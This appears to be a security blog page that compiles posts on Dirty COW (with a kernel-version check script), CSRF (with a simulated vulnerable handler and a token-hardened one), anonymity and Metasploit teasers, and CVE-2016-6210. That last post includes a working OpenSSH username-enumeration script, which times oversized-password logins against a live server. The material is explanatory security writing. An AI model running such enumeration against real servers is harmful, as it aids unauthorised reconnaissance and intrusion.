Linux kernel 9-year-old “dirty cow” 0-day vulnerability


This vulnerability, nicknamed Dirty COW (dirty copy-on-write), has existed in the Linux kernel for up to nine years, meaning it was already present in a kernel version released in 2007. The Linux kernel team has now fixed it.

Vulnerability ID:


Vulnerability name:

Dirty COW

Affected versions

Linux kernel >= 2.6.22

Vulnerability Overview:
Specifically, a race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. A malicious local user could exploit this race to gain write access to memory mappings that should be read-only.

A race condition arises when the outcome depends on the relative timing of concurrent operations; it can crash an application, or give an attacker a foothold for further code execution. With this vulnerability, a local attacker can escalate privileges on the target system and may even gain root.

According to the information released with the official patch, the problem can be traced back to a Linux kernel version released in 2007. There is no evidence yet of whether the vulnerability was exploited at any point since 2007, but security researcher Phil Oester said he found an attacker using it in a live attack, and Red Hat was informed of the recent attacks.

How to fix

Greg Kroah-Hartman, who maintains the stable Linux kernel series, released maintenance updates for the Linux 4.8, 4.7 and 4.4 LTS kernel families (Linux kernel 4.8.3, 4.7.9 and 4.4.26 LTS) to fix the vulnerability. The updated kernels are now available in the repositories of GNU/Linux distributions including Arch Linux (in testing), Solus and all supported versions of Ubuntu. Debian developers also announced, two days earlier, an important kernel update for the Debian GNU/Linux 8 “Jessie” stable series; that update fixes a total of four Linux kernel security vulnerabilities, including Dirty COW.

Operating system vendors should immediately pick up Linux kernel 4.8.3, Linux kernel 4.7.9 or Linux kernel 4.4.26 LTS and ship the update to users through their stable update channels.
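As an added example (not part of the original article and not code from the kernel project), the following Python function turns the version information above into a quick local check of a `uname -r` string. It assumes, beyond what the article states, that any stable series newer than 4.8 already contains the mainline fix, and it deliberately refuses to judge distribution-built kernels (those with a vendor suffix such as `-45-generic` or `.el7`) from the number alone, because vendors backport fixes without bumping the upstream version.

```python
import platform
import re

# Fixed releases named in the article: stable series -> first fixed patch level.
FIXED_IN = {(4, 8): 3, (4, 7): 9, (4, 4): 26}
FIRST_AFFECTED = (2, 6, 22)          # article: Linux kernel >= 2.6.22

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(.*)$")


def parse_release(release):
    """Split a `uname -r` string into (major, minor, patch) and the trailing
    vendor suffix, e.g. '4.4.0-45-generic' -> ((4, 4, 0), '-45-generic')."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0)), suffix


def dirty_cow_status(release):
    """Classify a kernel release string. Returns one of:
      'unaffected'   - older than 2.6.22, before the bug was introduced
      'patched'      - at or above the fix level for its stable series
      'vulnerable'   - in a series with a named fix, but below that level
      'check-vendor' - a series not covered by the updates named here, or a
                       distro build that may carry a backported fix
    """
    (major, minor, patch), suffix = parse_release(release)
    if (major, minor, patch) < FIRST_AFFECTED:
        return "unaffected"
    if suffix:                      # distro kernel: upstream number is not meaningful
        return "check-vendor"
    series = (major, minor)
    if series in FIXED_IN:
        return "patched" if patch >= FIXED_IN[series] else "vulnerable"
    if series > (4, 8):             # assumption: released after the mainline fix
        return "patched"
    return "check-vendor"


if __name__ == "__main__":
    running = platform.release()    # same string as `uname -r` on Linux
    print(f"{running}: {dirty_cow_status(running)}")
```

A result of `check-vendor` is the common case on Debian, Ubuntu or RHEL hosts; there, the vendor advisory (or the distribution's changelog for the running kernel package) is the authoritative source, not the upstream version number.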


Cross Site Request Forgery [CSRF-XSRF] Vulnerability.

Cross Site Request Forgery

Cross-site request forgery (CSRF), also known as a one-click attack, session riding or Sea-Surf, and abbreviated CSRF or XSRF, is a type of malicious exploit of a website (web application) in which unauthorized commands are transmitted from a user that the website trusts. The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and the privileges of the victim. When targeting a normal user, a successful CSRF attack can compromise that user’s data and the functions associated with their account in the web application.

If the targeted end user is an administrator account, a CSRF attack can compromise the entire web application. The sites most likely to be attacked by CSRF are community websites (social networking sites, email providers and forums) and sites with high-value accounts such as banks and stock brokerages.

Using social engineering, an attacker (pentester or hacker) can embed malicious HTML or JavaScript code into an email or website that requests a specific task URL. The task then executes with or without the user’s knowledge, either directly or by leveraging a cross-site scripting flaw.

A CSRF attack is a malicious exploit of a website in which a user’s browser transmits requests that the target website trusts, without the user’s consent.
In cross-site scripting (XSS), the attacker exploits the trust a user has in a website; in CSRF, by contrast, the attacker exploits the trust a website has in a user’s browser.

Basically, an attacker uses CSRF to trick a victim into visiting a website or clicking a link that contains malicious or unauthorized requests, using some of the best social engineering tips and tricks to do so.

When a request is made to most websites, browsers automatically include any credentials associated with that site, such as the user’s session cookie or HTTP basic authentication credentials, and the request naturally carries the user’s IP address.
Thus, if the user’s authenticated session is still valid, an attacker can use CSRF to launch any desired request against the website, and the website cannot distinguish a forged request from a legitimate one.
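To make the last two paragraphs concrete, here is an added example (not code from the original article) in Python. It models a money-transfer endpoint on a hypothetical site `https://bank.example` with a logged-in user `alice`. The vulnerable handler trusts the session cookie alone, so a form posted from an attacker’s page (to which the browser attaches alice’s cookie automatically) goes through. The hardened handler additionally checks the `Origin` header and requires a per-session synchronizer token, which the attacker’s page cannot read because of the same-origin policy. All names, session ids and amounts are constructed for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Hypothetical deployment values for the example.
SERVER_SECRET = secrets.token_bytes(32)   # assumed per-deployment secret
SITE_ORIGIN = "https://bank.example"      # assumed origin of the target site


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as a web framework exposes it."""
    method: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def new_sessions():
    """Fresh server-side session store so each run starts from the same state."""
    return {"sess-alice": {"user": "alice", "balance": 100}}


def csrf_token(session_id):
    """Synchronizer token: HMAC of the session id under the server secret.
    The site embeds it in its own forms; a cross-origin page cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(sessions, req):
    """Trusts the session cookie alone: exactly the pattern CSRF abuses."""
    sess = sessions.get(req.cookies.get("session"))
    if req.method != "POST" or sess is None:
        return 403
    sess["balance"] -= int(req.form["amount"])
    return 200


def transfer_hardened(sessions, req):
    """Same action, but requires proof that our own page issued the request."""
    sid = req.cookies.get("session")
    sess = sessions.get(sid)
    if req.method != "POST" or sess is None:
        return 403
    # Check 1: Origin (or Referer as a fallback) must be our own site.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(SITE_ORIGIN):
        return 403
    # Check 2: the form must carry the per-session token (constant-time compare).
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(sid)):
        return 403
    sess["balance"] -= int(req.form["amount"])
    return 200


def forged_request():
    """What the browser sends when the victim visits the attacker's page: the
    attacker controls method and form fields, the browser sets Origin to the
    attacker's site and attaches the victim's session cookie automatically."""
    return Request(
        method="POST",
        cookies={"session": "sess-alice"},
        form={"to": "attacker", "amount": "40"},
        headers={"Origin": "https://evil.example"},
    )


def legitimate_request():
    """A request from the site's own transfer form, which embedded the token."""
    return Request(
        method="POST",
        cookies={"session": "sess-alice"},
        form={"to": "bob", "amount": "40", "csrf_token": csrf_token("sess-alice")},
        headers={"Origin": SITE_ORIGIN},
    )


def demo():
    """Run forged and legitimate requests against both handlers.
    Returns {case: (http_status, alice's balance afterwards)}."""
    results = {}
    s = new_sessions()
    results["forged_vs_vulnerable"] = (transfer_vulnerable(s, forged_request()), s["sess-alice"]["balance"])
    s = new_sessions()
    results["forged_vs_hardened"] = (transfer_hardened(s, forged_request()), s["sess-alice"]["balance"])
    s = new_sessions()
    results["legit_vs_hardened"] = (transfer_hardened(s, legitimate_request()), s["sess-alice"]["balance"])
    return results


if __name__ == "__main__":
    for case, (status, balance) in demo().items():
        print(f"{case}: HTTP {status}, balance now {balance}")
```

The two checks are complementary: the token defends even when a browser omits `Origin` and `Referer`, while the origin check catches a token that has leaked. Marking the session cookie `SameSite=Lax` or `Strict` adds a third, browser-enforced layer, but should not be the only one.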

To get the full idea of CSRF vulnerabilities, here is a simple example in a picture:

[Image: CSRF Simple Example]

Thanks for reading our article. I hope you find it useful; please share it with your friends.

Maximize your anonymity: Whonix and Kali Linux 2016.2

The need for anonymous surfing today is pressing. Our privacy is being taken from us, and the vast majority of Internet users are far from being cybercriminals. Today we’ll show you how to make yourself as anonymous as possible on the Internet using Whonix and Kali Linux 2016.2.

What is Whonix?

Whonix is an operating system focused on anonymity, privacy and security. It uses Tor as the basis for all connections and Debian as the underlying operating system. It ensures that DNS leaks are impossible and that even malware installed on the computer with root privileges cannot discover the real IP address.

Continue reading

Metasploit Framework for Penetration Tester

The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an all-in-one centralized console and gives you efficient access to virtually all of the options available in the MSF. Msfconsole may seem intimidating at first, but once you learn the syntax of its commands you will come to appreciate the power of this interface.

From msfconsole you can access and use all Metasploit plugins, payloads, exploit modules, post-exploitation modules and so on. The msfconsole interface can also integrate third-party programs such as nmap and sqlmap, which can be run directly from inside msfconsole.

Continue reading

Attacking WPA-PSK

WPA / WPA2 Introduction 

It’s probably apparent by now that WEP needed to be replaced. To accomplish this the IEEE developed a new standard, 802.11i, and the Wi-Fi Alliance introduced Wi-Fi Protected Access (WPA). WPA is actually based on a draft version of 802.11i and does not implement all the features of the standard. WPA was intended to be a quick fix for WEP whilst the full implementation of 802.11i, WPA2, was developed.
Continue reading

CVE-2016-6210: OpenSSH – user enumeration

1. Affected versions

OpenSSH <= 7.2p2

2.Descriptions of the vulnerability

When a client attempts password authentication with a username that does not exist, sshd hashes the supplied password against a fake BLOWFISH-based hash; when the username does exist, sshd hashes the password with the SHA256/SHA512 algorithm used for the real password hash. If we send a very large password (> 10 KB), the SHA256/SHA512 computation takes much longer than the BLOWFISH computation over the fake password, because its cost grows with password length. Based on this timing difference, we can enumerate valid usernames on the ssh server.
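The following Python script is an added example of the technique just described; it is not the original article’s code. The offline part classifies a constructed set of per-username timings: the median time for each candidate name is compared with the median for a name chosen so that it cannot exist (`zz-no-such-user`), and names whose median is at least twice the baseline are reported as existing. The optional `time_password_auth` function performs one real timed attempt with an oversized password using the third-party paramiko library; the host, the 25 KB password length, the three-attempt count and the 2x threshold are assumptions, and it must only be run against hosts you are authorised to test.

```python
import statistics
import time

# Constructed sample data: seconds per password-auth attempt, three attempts per
# name, as collect_timings() below would record against a single sshd.
BASELINE_USER = "zz-no-such-user"    # chosen so it cannot be a real account
SAMPLE_TIMINGS = {
    BASELINE_USER: [0.12, 0.13, 0.11],
    "root":        [0.48, 0.51, 0.47],
    "bob":         [0.13, 0.12, 0.14],
    "www-data":    [0.45, 0.50, 0.46],
}


def time_password_auth(host, username, port=22, password_len=25000):
    """Time one password-auth attempt using an oversized password (> 10 KB).
    paramiko is imported lazily so the offline part of this file runs without it."""
    import paramiko
    transport = paramiko.Transport((host, port))
    try:
        transport.connect()                      # key exchange only, no auth yet
        start = time.perf_counter()
        try:
            transport.auth_password(username, "A" * password_len)
        except paramiko.AuthenticationException:
            pass                                 # expected: we do not know the password
        return time.perf_counter() - start
    finally:
        transport.close()


def collect_timings(host, usernames, attempts=3):
    """Probe each candidate name several times, always including the baseline
    name so classify() has a reference for the 'user does not exist' case."""
    names = [BASELINE_USER] + list(usernames)
    return {u: [time_password_auth(host, u) for _ in range(attempts)] for u in names}


def classify(timings, baseline_user=BASELINE_USER, factor=2.0):
    """Return {username: likely_exists}. A name counts as existing when the
    median of its attempts is at least `factor` times the baseline median;
    medians keep a single slow network round trip from mislabelling a name."""
    baseline = statistics.median(timings[baseline_user])
    return {
        user: statistics.median(samples) >= factor * baseline
        for user, samples in timings.items()
        if user != baseline_user
    }


if __name__ == "__main__":
    for user, exists in classify(SAMPLE_TIMINGS).items():
        print(f"{user:12s} {'exists' if exists else 'does not exist'}")
```

On a patched server the two code paths take comparable time regardless of whether the user exists, so every candidate falls below the threshold; a noisy link can be compensated for by raising `attempts`, not by lowering `factor`.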

Continue reading